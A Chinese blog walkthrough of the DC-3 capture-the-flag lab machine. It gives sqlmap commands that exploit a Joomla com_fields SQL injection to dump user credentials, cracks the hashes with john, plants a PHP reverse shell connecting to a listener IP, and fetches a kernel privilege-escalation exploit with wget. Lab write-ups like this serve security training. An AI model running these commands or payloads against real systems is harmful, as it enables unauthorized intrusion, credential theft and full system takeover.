首页 > 其他分享 >DC-3靶机

DC-3靶机

时间:2024-09-08 20:48:56浏览次数:9  
标签:sqlmap python fields 11.6 DC 靶机 com 10.204

nmap -sV 10.204.11.0/24
先进行扫描找到靶机

image

开启了80端口
查看一下

image
image

再扫一下目录发现后台登陆页面
http://10.204.11.6/administrator/
没有账号密码
去查一下这个cms的漏洞

image

我们直接sqlmap查出我们所要用的全部信息即可

python sqlmap.py -u "http://10.204.11.6:80/index.php?option=com_fields&view=fields&layout=modal&list[f
ullordering]=*" --dbs
查库
python sqlmap.py -u "http://10.204.11.6//index.php?option=com_fields&view=fields&layout=modal&list[ful
lordering]=*" -D "joomladb" --tables
查表
python sqlmap.py -u "http://10.204.11.6//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" --columns
查字段
python sqlmap.py -u "http://10.204.11.6//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" -C "password,username" --dump
查password,username字段的内容

最终的结果

image

password经过了MD5加密

我们用kali的john解密即可

把密文放入创建的文件即可

image

然后我们就可以去尝试登陆了
进入后经过测试

image
image
image

随便找一个php页面然后插入命令以帮助自己拿到shell即可
例如

当系统没有禁用proc_popen的时候,我们是可以借助proc_popen轻松反弹这样的一个shell的。
$sock = fsockopen("192.168.79.128", "5555");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

插入后保存即可

image

然后开启一个监听

nc -lvvp 5555

紧接着去访问你插入内容的页面即可

image

python -c "import pty;pty.spawn('/bin/bash')"
交互

然后我们没有权限进入/root
很明显是要进行提权

这里我们利用靶机系统漏洞进行提权

image

查看版本和内核
之后直接去搜索漏洞

image

使用这个即可

Ubuntu 16.04提权

查看提权步骤

image

地址改变了
下面的可以用

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

image
image

直接进入/root
查看flag即可通关

image

标签:sqlmap,python,fields,11.6,DC,靶机,com,10.204
From: https://www.cnblogs.com/dghh/p/18403424

相关文章

  • 红日靶机(一) 笔记
    红日靶机(一)笔记概述域渗透靶机,可以练习对域渗透的一些知识,主要还是要熟悉powershell语法,powershell往往比cmd的命令行更加强大,而很多渗透开源的脚本都是powershell的。例如NiShang,PowerView等等。这是域渗透的初学靶机。其中也遇到了一些问题靶机地址:http://vulnsta......
  • ADC采样时间、采样周期、采样频率计算方法
    一、概述ADC转换就是输入模拟的信号量转换成数字量。读取数字量必须等转换完成后,完成一个通道的读取叫做采样周期。采样周期一般来说=转换时间+读取时间,而转换时间=采样时间+12.5个时钟周期。采样时间是你通过寄存器告诉STM32采样模拟量的时间,设置越长越精确二、STM32ADC......
  • 计算机图形学—NDC归一化设备坐标
    NDC(NormalizedDeviceCoordinates)即归一化设备坐标,是计算机图形学中用于表示和处理图形的一个坐标系统。NDC的坐标范围通常是从[−1,1][−1,1]在x和y轴上,z轴上则是从0到1。它是在将模型空间中的三维坐标转换为屏幕空间坐标之前的一个中间步骤。Frustum:模型的可视......
  • Keysight U8031A DC power supply
    KeysightU8031ADCpowersupply文章目录KeysightU8031ADCpowersupply前言电容充电⽰意图一、恒定电压操作二、恒定电流操作三、5v操作四、跟踪模式操作五、存储器操作六、对过电压保护编程七、对过电流保护编程八、锁键操作前言U8031APowerSupply是一款......
  • tailwindcss学习:1. vue项目配置 tailwindcss
    官网的配置是需要一个cli去生成一份CSS,我简单总结一下更加干货的配置办法:1.pnpmipostcssautoprefixertypescript2.配置postcss.config.cjsmodule.exports={plugins:{tailwindcss:{},autoprefixer:{},},};3.执行npxtailwindcssinit4.项目的sr......
  • JavaScript 中 structuredClone 和 JSON.parse(JSON.stringify()) 克隆对象的区别
    JavaScript中structuredClone和JSON.parse(JSON.stringify())克隆对象的异同点一、什么是structuredClone?1.structuredClone的发展structuredClone是在ECMAScript2021(ES12)标准中引入的,ECMAScript2021规范正式发布于2021年6月自2022年3月起,该功能适用于最......
  • STM32(十):ADC模数转换器
    ADC(Analog-DigitalConverter)模拟-数字转换器        ADC可以将引脚上连续变化的模拟电压转换为内存中存储的数字变量,建立模拟电路到数字电路的桥梁。        12位逐次逼近型ADC,1us转换时间,分辨率:0~2^12-1          输入电压范围:0~3.3V,转换结果范......
  • 常见概念 -- DCM色散补偿
    色散的概念光是一种电磁波,在特定介质中,光的相速度随频率(波长)或传输模式有差异,造成光波在通过介质后,不同频率成分光波的相位形成分散或分离的效果,称为色散。日常生活中,最广为人知的色散现象是白光(复合光)通过三棱镜后形成彩色光带(光谱)的效果。在光纤传输中也存在色散效应......
  • 软件架构设计——DCI 范型
    什么是DCI范型?DCI(Data,Context,andInteraction)范型是一种软件架构设计模式,旨在更清晰地表达系统的行为和状态。DCI试图通过将系统的结构(数据)与行为(交互)分离开来,以便更好地解决业务逻辑的复杂性,并提高代码的可读性和可维护性。DCI范型由三个主要组成部分:数据(Data)、上下......
  • WeGame平台启动时闪退提示“未找到d3dcompiler.dll”该怎么修复?WeGame平台崩溃弹窗“
    当WeGame平台启动时闪退并提示“未找到d3dcompiler.dll”,您无需太过焦虑。您可以尝试重新安装DirectX组件,或者从可靠渠道获取该文件并正确放置。还可以检查系统和平台的更新,以修复此问题。本篇将为大家带来WeGame平台启动时闪退提示“未找到d3dcompiler.dll”该怎么修复的内容,......